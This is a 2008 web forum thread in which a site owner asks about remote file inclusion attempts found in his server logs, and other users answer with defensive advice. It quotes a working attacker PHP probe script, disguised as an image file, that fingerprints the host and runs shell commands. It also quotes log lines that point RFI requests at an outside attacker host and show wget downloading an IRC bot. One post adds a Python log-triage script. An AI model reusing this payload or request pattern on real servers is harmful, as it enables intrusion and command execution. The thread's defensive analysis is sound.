PHP Injection Exploit

Posted: Mon Mar 24, 2008 10:08 pm
by bcarpio
I keep seeing these in my logs (xxx.xxx.xxx.xxx is my server's IP):

xxx.xxx.xxx.xxx - - [23/Mar/2008:08:05:13 -0700] "GET /?config%255broot_dir%255d=http://imoet.100webspace.net/gambar.jpg%3f HTTP/1.1" 200 7925 "-" "libwww-perl/5.805"


xxx.xxx.xxx.xxx - - [23/Mar/2008:08:05:17 -0700] "GET /?config%255broot_dir%255d=http://imoet.100webspace.net/gambar.jpg%3f HTTP/1.1" 200 7925 "-" "libwww-perl/5.805"


You will notice the 200 success code.

If you download this gambar.jpg file, you will see that it is a php script:

------- start gambar.jpg -------

<?
// Probe script served under the name gambar.jpg. It prints two digit-string
// markers ("31337" and "31234", built by concatenation) around its output,
// likely so the bot can confirm that the file was included and executed.
$dir = @getcwd();
$ker = @php_uname();
echo "3"."1"."3"."3"."7"."<br>";   // start marker
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";          // host fingerprint: OS and kernel
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";                          // runs `id` to learn which user PHP executes as
$eseguicmd=ex($cmd);
echo $eseguicmd;
// Tries each command-execution function in turn, so disabling only one of
// them via disable_functions is not enough to stop it.
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
// Formats a byte count as B/KB/MB/GB for the "Free:" line above.
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}

echo "<br>3"."1"."2"."3"."4<br>";   // end marker
?>
--------------------------------------------

My hosting company has alerted me to this issue. I'm not sure what this script does that allows for a PHP injection, if anything... if someone can help me put the pieces together that would be great.

Re: PHP Injection Exploit

Posted: Mon Mar 24, 2008 10:24 pm
by Weirdan
Are you running aMember Pro?

Re: PHP Injection Exploit

Posted: Mon Mar 24, 2008 10:55 pm
by bcarpio
No,

There are hundreds of logs from the attacker searching for everything from aMember Pro to phpBB... but I am not running any of them... the thing is that the site that shows the 200 is just a static HTML site... the rest of my sites run Joomla, but I don't see any of these in the logs for the sites running Joomla.

The other odd thing is that the pk.txt file is uploaded to /tmp/.ICE-unix

Re: PHP Injection Exploit

Posted: Tue Mar 25, 2008 1:36 am
by Mordred
1. It's getting a 200 because it's requesting / (which exists).
The other text is after the ?, meaning it's part of the query.

2. Have you tried accessing the same URL on your server to see what happens? My guess is: nothing.
It's just a stupid bot trying its luck with you.

3. Wait... what pk.txt?

Re: PHP Injection Exploit

Posted: Tue Mar 25, 2008 8:01 am
by bcarpio
Yes, I believe that this script hidden in gambar.jpg is somehow allowing my server to be exploited. If you see this:
http://imoet.100webspace.net/gambar.jpg

Now let me show you an excerpt from my error_log:

-------------------------------------------

error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
--04:48:44-- http://imoet.100webspace.net/pk.txt
Resolving imoet.100webspace.net... 64.72.112.169
Connecting to imoet.100webspace.net|64.72.112.169|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84143 (82K) [text/plain]
Saving to: `pk.txt'

0K .......... .......... .......... .......... .......... 60% 239K 0s
50K .......... .......... .......... .. 100% 622K=0.3s

04:48:44 (315 KB/s) - `pk.txt' saved [84143/84143]

error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key

-----------------------------------

You can see that this site is somehow exploiting my server to upload a pk.txt file. This pk.txt file is an IRC bot which is eventually used to attack other sites, but I assume that the initial attack begins with the gambar.jpg.

Re: PHP Injection Exploit

Posted: Tue Mar 25, 2008 8:57 am
by Mordred
1. Disable this if you're not using it:
http://bg.php.net/manual/en/ref.filesys ... -url-fopen

2. Copy your logs aside and collect all occurrences like the ones you showed us. Maybe the bot is trying a few known RFI holes and is finding one; finding which one will allow you to patch the root cause of the vulnerability.
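One way to do the log triage suggested above, as an added example that is not part of this thread: a Python script that parses Apache combined-format lines like the ones quoted earlier, decodes the query string until the double-encoded brackets (%255b) resolve, and flags any parameter whose value is a remote URL, which is the RFI pattern. The sample log lines are constructed from the thread's entries, with the server IP left as the xxx placeholder.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Constructed sample, modelled on the access-log lines quoted in the thread.
SAMPLE_LOG = """\
xxx.xxx.xxx.xxx - - [23/Mar/2008:08:05:13 -0700] "GET /?config%255broot_dir%255d=http://imoet.100webspace.net/gambar.jpg%3f HTTP/1.1" 200 7925 "-" "libwww-perl/5.805"
xxx.xxx.xxx.xxx - - [23/Mar/2008:08:06:01 -0700] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
xxx.xxx.xxx.xxx - - [23/Mar/2008:08:06:40 -0700] "GET /images/logo.png HTTP/1.1" 304 0 "-" "Mozilla/5.0"
"""

# Apache combined format: host ident user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+) "[^"]*" "([^"]*)"')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def fully_decode(text, max_rounds=5):
    """Strip every layer of percent-encoding. The logged request double-encodes
    the brackets (%255b -> %5b -> [), so a single unquote is not enough."""
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def rfi_indicators(line):
    """Describe the request if any query parameter carries a remote URL, else None."""
    match = LINE_RE.match(line)
    if not match:
        return None
    ip, when, method, target, status, _size, agent = match.groups()
    _path, _sep, query = target.partition('?')
    remote_params = [
        (fully_decode(name), fully_decode(value))
        for name, value in parse_qsl(query, keep_blank_values=True)
        if REMOTE_RE.match(fully_decode(value))
    ]
    if not remote_params:
        return None
    # A 200 here only says the requested path ("/") exists; it does not tell
    # you whether the remote file was actually included and run.
    return {"ip": ip, "time": when, "method": method, "status": int(status),
            "agent": agent, "params": remote_params}


def scan(log_text):
    """Run the check over every line; the hits are what to group by parameter name."""
    return [hit for hit in map(rfi_indicators, log_text.splitlines()) if hit]
```

Grouping the hits by decoded parameter name (here `config[root_dir]`) shows which application parameter the bot is probing, which is the clue needed to identify the component being targeted.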

Re: PHP Injection Exploit

Posted: Tue Mar 25, 2008 9:32 am
by bcarpio
Yeah, I have register_globals = Off and allow_url_fopen = Off.

I guess all I can really do is keep going through the logs and try to find a URL they passed that "worked"?

Any other suggestions?

Re: PHP Injection Exploit

Posted: Tue Mar 25, 2008 10:21 am
by Mordred
If you're sure you have allow_url_fopen = Off, then the hole being exploited is NOT RFI.

Re: PHP Injection Exploit

Posted: Tue Mar 25, 2008 1:47 pm
by Weirdan
bcarpio wrote: Now let me show you an excerpt from my error_log:
[.................................]
--04:48:44-- http://imoet.100webspace.net/pk.txt
Resolving imoet.100webspace.net... 64.72.112.169
Connecting to imoet.100webspace.net|64.72.112.169|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84143 (82K) [text/plain]
Saving to: `pk.txt'

0K .......... .......... .......... .......... .......... 60% 239K 0s
50K .......... .......... .......... .. 100% 622K=0.3s

04:48:44 (315 KB/s) - `pk.txt' saved [84143/84143]
[...............................]
Looks like output from wget.

Re: PHP Injection Exploit

Posted: Tue Mar 25, 2008 2:03 pm
by bcarpio
Hmm, apparently my problem is related to this:

http://www.heise-online.co.uk/security/ ... news/75459

I use Joomla on almost all of my sites. Although I am not running this "Perform" component, there must be another component that is being compromised. The odd thing is I do have register_globals=Off in my php.ini.